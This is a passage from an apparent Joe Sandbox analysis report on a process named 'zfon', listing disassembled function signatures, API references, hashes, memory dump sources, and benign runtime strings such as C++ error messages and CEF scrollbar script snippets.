                                                                                                • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: Winerror_messagememcpymemmovememsetstd::_
                                                                                                • String ID: unknown error
                                                                                                • API String ID: 3480822978-3078798498
                                                                                                • Opcode ID: 98119a2c876a1c59b561851f97c996c2cff6274175daffcd9d743103a7d01bdb
                                                                                                • Instruction ID: 416e2d1cabe49680688a4044d142d9ffb7b645903a127a6521d81a236acf68ec
                                                                                                • Opcode Fuzzy Hash: 98119a2c876a1c59b561851f97c996c2cff6274175daffcd9d743103a7d01bdb
                                                                                                • Instruction Fuzzy Hash: B421DE22A28AE691EB189F2DD50927D73A1EB41FC8F589130CB2D073D9EF7CE151A340
                                                                                                APIs
                                                                                                • ?_Xout_of_range@std@@YAXPEBD@Z.MSVCP140(?,?,?,00007FF7F96E307B), ref: 00007FF7F96E327D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: Xout_of_range@std@@
                                                                                                • String ID: invalid string position
                                                                                                • API String ID: 1960685668-1799206989
                                                                                                • Opcode ID: 39bc57a7c996044000b8f0ac340acb9529ebaab51d3efb8f16ee4a635c87aee7
                                                                                                • Instruction ID: 05d38e7e1a2ae28b06aa300238e4183c89943face1cd57bac718f7a628c74331
                                                                                                • Opcode Fuzzy Hash: 39bc57a7c996044000b8f0ac340acb9529ebaab51d3efb8f16ee4a635c87aee7
                                                                                                • Instruction Fuzzy Hash: 7121A462B18B8981EF48AF1EF9845686361EB58FC4FD84130CB6D07799DF3EE4918394
                                                                                                APIs
                                                                                                  • Part of subcall function 00007FF7F96E2520: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96E25C3
                                                                                                  • Part of subcall function 00007FF7F96E2520: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96E25D3
                                                                                                  • Part of subcall function 00007FF7F96E2520: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96E25E3
                                                                                                  • Part of subcall function 00007FF7F96E2520: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96E25F0
                                                                                                • cef_string_map_alloc.LIBCEF ref: 00007FF7F96FEEC5
                                                                                                • cef_string_map_alloc.LIBCEF ref: 00007FF7F96FEEFD
                                                                                                Strings
                                                                                                • if (__scInternalExt && __scInternalExt.CustomScrollbar) { new __scInternalExt.CustomScrollbar().activate();}, xrefs: 00007FF7F96FEE6B
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: _invalid_parameter_noinfo_noreturn$cef_string_map_alloc
                                                                                                • String ID: if (__scInternalExt && __scInternalExt.CustomScrollbar) { new __scInternalExt.CustomScrollbar().activate();}
                                                                                                • API String ID: 3856544966-1929393026
                                                                                                • Opcode ID: 8e5c3c177139f802837b7980348f181a94c747ff7433c4aeb07622180e720b4f
                                                                                                • Instruction ID: e89f2a8a7ee87a71e9483e90a27752e2bbc76694df46d5556819ab794d7d1b62
                                                                                                • Opcode Fuzzy Hash: 8e5c3c177139f802837b7980348f181a94c747ff7433c4aeb07622180e720b4f
                                                                                                • Instruction Fuzzy Hash: 8D217162609B8581EB51AF14E84436AAB71FBC5BD4F989231EBAD03AEDDF3CC444C750
                                                                                                APIs
                                                                                                  • Part of subcall function 00007FF7F96E2520: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96E25C3
                                                                                                  • Part of subcall function 00007FF7F96E2520: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96E25D3
                                                                                                  • Part of subcall function 00007FF7F96E2520: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96E25E3
                                                                                                  • Part of subcall function 00007FF7F96E2520: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96E25F0
                                                                                                • cef_string_map_alloc.LIBCEF ref: 00007FF7F96FEFB5
                                                                                                • cef_string_map_alloc.LIBCEF ref: 00007FF7F96FEFED
                                                                                                Strings
                                                                                                • if (__scInternalExt && __scInternalExt.DisableTextSelect) { __scInternalExt.DisableTextSelect();}, xrefs: 00007FF7F96FEF5B
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: _invalid_parameter_noinfo_noreturn$cef_string_map_alloc
                                                                                                • String ID: if (__scInternalExt && __scInternalExt.DisableTextSelect) { __scInternalExt.DisableTextSelect();}
                                                                                                • API String ID: 3856544966-2589232223
                                                                                                • Opcode ID: c45757a5cfbc2a3afef824883f17d38b95613549d0e78bcdc3176d00afcd2908
                                                                                                • Instruction ID: a67fdcbcff995676c9a68e61f1f3965e0620054751ab7440714a9d622f98c22b
                                                                                                • Opcode Fuzzy Hash: c45757a5cfbc2a3afef824883f17d38b95613549d0e78bcdc3176d00afcd2908
                                                                                                • Instruction Fuzzy Hash: CF217122608B8181EB51AF15E85036AAB71FB85BD4F989231EBAD03AEDDF3CC444C750
                                                                                                APIs
                                                                                                  • Part of subcall function 00007FF8B9115920: _lock_locales.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FF8B911592F
                                                                                                • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00007FF8B90EACBC
                                                                                                • _CxxThrowException.VCRUNTIME140 ref: 00007FF8B90EACCD
                                                                                                  • Part of subcall function 00007FF8B90F5E20: setlocale.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FF8B90F5DA0
                                                                                                  • Part of subcall function 00007FF8B90F5E20: setlocale.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FF8B90F5DB2
                                                                                                  • Part of subcall function 00007FF8B90F5E20: setlocale.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FF8B90F5E3B
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: setlocale$ExceptionThrow_lock_localesstd::invalid_argument::invalid_argument
                                                                                                • String ID: bad locale name
                                                                                                • API String ID: 1683849403-1405518554
                                                                                                • Opcode ID: 7c9bcb853565743618b71d0b67f6afb15cda60452226c720ad76d4234984937c
                                                                                                • Instruction ID: 006cb07ff68ac54872a5cb3242eea11734198c3c98449d5297596b084feda014
                                                                                                • Opcode Fuzzy Hash: 7c9bcb853565743618b71d0b67f6afb15cda60452226c720ad76d4234984937c
                                                                                                • Instruction Fuzzy Hash: 39118F32A05BC189C7549F39A84005977B9EB98BE4B184275CBAC4339AEF38D955C340
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: Xlength_error@std@@
                                                                                                • String ID: gfffffff$vector<T> too long
                                                                                                • API String ID: 1004598685-118341189
                                                                                                • Opcode ID: e0575076ecd3c4c86da7fa7fd0dbc3d6825d5a55bda48c19eddb97b109de987b
                                                                                                • Instruction ID: 118a371cf005d83ce5a01a9cfa4e27814a6c6938a8e505aedf6b18ee36d58b23
                                                                                                • Opcode Fuzzy Hash: e0575076ecd3c4c86da7fa7fd0dbc3d6825d5a55bda48c19eddb97b109de987b
                                                                                                • Instruction Fuzzy Hash: 6B01A1D1B1479D42AE08CBA7BB188A48322A75CBC07919432DD1EDB394F83CA585C653
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: Xout_of_range@std@@memmove
                                                                                                • String ID: invalid string position
                                                                                                • API String ID: 1894236298-1799206989
                                                                                                • Opcode ID: dde0ee69190c90e305226251dbe193aa0800190eac452c817480dce08e476b2c
                                                                                                • Instruction ID: 229e0f5d80c6292740bb28573ed3e89d6a7d28620b6ae80acf05699eb03c9a5c
                                                                                                • Opcode Fuzzy Hash: dde0ee69190c90e305226251dbe193aa0800190eac452c817480dce08e476b2c
                                                                                                • Instruction Fuzzy Hash: 3411B461B14785C2DF04AF29E988068B372EB98FC8BA45031C72D477A8DE3ED55183A4
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2549874919.00007FF8BFB51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2549750292.00007FF8BFB50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549976829.00007FF8BFB63000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2550400824.00007FF8BFB68000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2550885347.00007FF8BFB69000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8bfb50000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: FileHeader$ExceptionRaise
                                                                                                • String ID: Access violation - no RTTI data!$Bad dynamic_cast!
                                                                                                • API String ID: 3685223789-3176238549
                                                                                                • Opcode ID: 161e8b28e34caca24568961a6528755d3751e4ffa6d3c1bec0c9a5cac7a2823b
                                                                                                • Instruction ID: f9d3452fa6dd4fcff8e6364d79d5f81f147fe3979685a8fdf27cf7470ec7ff45
                                                                                                • Opcode Fuzzy Hash: 161e8b28e34caca24568961a6528755d3751e4ffa6d3c1bec0c9a5cac7a2823b
                                                                                                • Instruction Fuzzy Hash: E8017165A39A46A1EE40DB9CE461278B362FF80BC4F445435E70E07769EF6CE548C700
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2549530455.00007FF8BFAD1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8BFAD0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2549435771.00007FF8BFAD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549570951.00007FF8BFAD5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549677238.00007FF8BFAD8000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549715751.00007FF8BFAD9000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8bfad0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: ExceptionFileHeaderRaise
                                                                                                • String ID: csm
                                                                                                • API String ID: 2573137834-1018135373
                                                                                                • Opcode ID: 603fe3ad4fecd5e6127da2d279c75e658a97bcbc96e57b625571bb65e3e10dd9
                                                                                                • Instruction ID: ad127e7f6064c049021bc6e614e3d34a494738a0acbb8a99f5649d30e4985eb6
                                                                                                • Opcode Fuzzy Hash: 603fe3ad4fecd5e6127da2d279c75e658a97bcbc96e57b625571bb65e3e10dd9
                                                                                                • Instruction Fuzzy Hash: 5B115B36A18B8183EB648F59F44026977E5FB88B98F585234EF8C07798DF3CC5618B00
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2549874919.00007FF8BFB51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2549750292.00007FF8BFB50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549976829.00007FF8BFB63000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2550400824.00007FF8BFB68000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2550885347.00007FF8BFB69000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8bfb50000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: ExceptionFileHeaderRaise
                                                                                                • String ID: csm
                                                                                                • API String ID: 2573137834-1018135373
                                                                                                • Opcode ID: 96783e5d5ee86e7ed91570add2de904558e3ade983638e121ecc73efc59d9239
                                                                                                • Instruction ID: 551a36d556d26d41289238a039416c28a131dfde6e7814a36af92ee13dc65d01
                                                                                                • Opcode Fuzzy Hash: 96783e5d5ee86e7ed91570add2de904558e3ade983638e121ecc73efc59d9239
                                                                                                • Instruction Fuzzy Hash: A0112B36618B8192EB658B29E450269B7E5FB88B98F584234EF8C07758DF3DD551CB00
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: __std_exception_copyrand_s
                                                                                                • String ID: invalid random_device value
                                                                                                • API String ID: 979846984-3926945683
                                                                                                • Opcode ID: 1f8ed5a527de385152b09c5ece5034331ea420588227d0af696af0a8ee27bb76
                                                                                                • Instruction ID: 8e6503cf98535788b41c1dcab9bcf08a8fa8f0b55b42fb287304e38b1bf120b2
                                                                                                • Opcode Fuzzy Hash: 1f8ed5a527de385152b09c5ece5034331ea420588227d0af696af0a8ee27bb76
                                                                                                • Instruction Fuzzy Hash: 87F09075B18A85E1EB059F69E8900A83374EF98B80F844431E75D87B90EF3CE5A9D300
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: ExceptionThrow__std_exception_copystd::invalid_argument::invalid_argument
                                                                                                • String ID: bad function call
                                                                                                • API String ID: 1180758849-3612616537
                                                                                                • Opcode ID: e7b691aa0131a1abb8dcc5df0449dfc66b02b47a65c773ff1f5cad3373210a14
                                                                                                • Instruction ID: 7be58c2aa8516af623fd180ef3c23c5b6999357e6d463c1f058f688f08fd99e3
                                                                                                • Opcode Fuzzy Hash: e7b691aa0131a1abb8dcc5df0449dfc66b02b47a65c773ff1f5cad3373210a14
                                                                                                • Instruction Fuzzy Hash: A7D09262A28986A5DE11AB29D8510AA6325BB943C4F900172D25D06AB6EE1CE609D710
                                                                                                APIs
                                                                                                  • Part of subcall function 00007FF8BFB56E48: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF8BFB529EE), ref: 00007FF8BFB56E56
                                                                                                • terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8BFB5F48A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2549874919.00007FF8BFB51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2549750292.00007FF8BFB50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549976829.00007FF8BFB63000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2550400824.00007FF8BFB68000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2550885347.00007FF8BFB69000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8bfb50000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: abortterminate
                                                                                                • String ID: csm$f
                                                                                                • API String ID: 661698970-629598281
                                                                                                • Opcode ID: 89070a3729e3cdc045543aa2d9e9ff952cd9e076b18af429ec74a74252da6a16
                                                                                                • Instruction ID: ac9395c15e5169c9d9001a590399c4ede0612301273408b2dbf089c8e31b4680
                                                                                                • Opcode Fuzzy Hash: 89070a3729e3cdc045543aa2d9e9ff952cd9e076b18af429ec74a74252da6a16
                                                                                                • Instruction Fuzzy Hash: D9E06532D0825291E7606BA5B29013DA7A4EF49BD4F148074DF8806646CF3CE4A08701
                                                                                                APIs
                                                                                                • _W_Getdays.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FF8B90ED40D
                                                                                                  • Part of subcall function 00007FF8B90EB710: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF8B90FC445), ref: 00007FF8B90EB739
                                                                                                  • Part of subcall function 00007FF8B90EB710: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF8B90FC445), ref: 00007FF8B90EB768
                                                                                                  • Part of subcall function 00007FF8B90EB710: memcpy.VCRUNTIME140(?,?,00000000,00007FF8B90FC445), ref: 00007FF8B90EB77F
                                                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B90ED42A
                                                                                                Strings
                                                                                                • :Sun:Sunday:Mon:Monday:Tue:Tuesday:Wed:Wednesday:Thu:Thursday:Fri:Friday:Sat:Saturday, xrefs: 00007FF8B90ED435
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: free$Getdaysmallocmemcpy
                                                                                                • String ID: :Sun:Sunday:Mon:Monday:Tue:Tuesday:Wed:Wednesday:Thu:Thursday:Fri:Friday:Sat:Saturday
                                                                                                • API String ID: 1347072587-3283725177
                                                                                                • Opcode ID: 35240cb5f5100ad4a6dbdd5295e329d3b5d0df92d6cb6440ee87cb48881eb460
                                                                                                • Instruction ID: 9f112bebb3934ae2b68ac2c733ef7f8c903aeaa85f33138911183ff3f6d1b9c8
                                                                                                • Opcode Fuzzy Hash: 35240cb5f5100ad4a6dbdd5295e329d3b5d0df92d6cb6440ee87cb48881eb460
                                                                                                • Instruction Fuzzy Hash: DFE03921B18B82A2EE149F1AF5442682370EF08BD0F880134DB0D03B50EF3CE4A48310
                                                                                                APIs
                                                                                                • _W_Getmonths.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FF8B90ED45D
                                                                                                  • Part of subcall function 00007FF8B90EB710: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF8B90FC445), ref: 00007FF8B90EB739
                                                                                                  • Part of subcall function 00007FF8B90EB710: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF8B90FC445), ref: 00007FF8B90EB768
                                                                                                  • Part of subcall function 00007FF8B90EB710: memcpy.VCRUNTIME140(?,?,00000000,00007FF8B90FC445), ref: 00007FF8B90EB77F
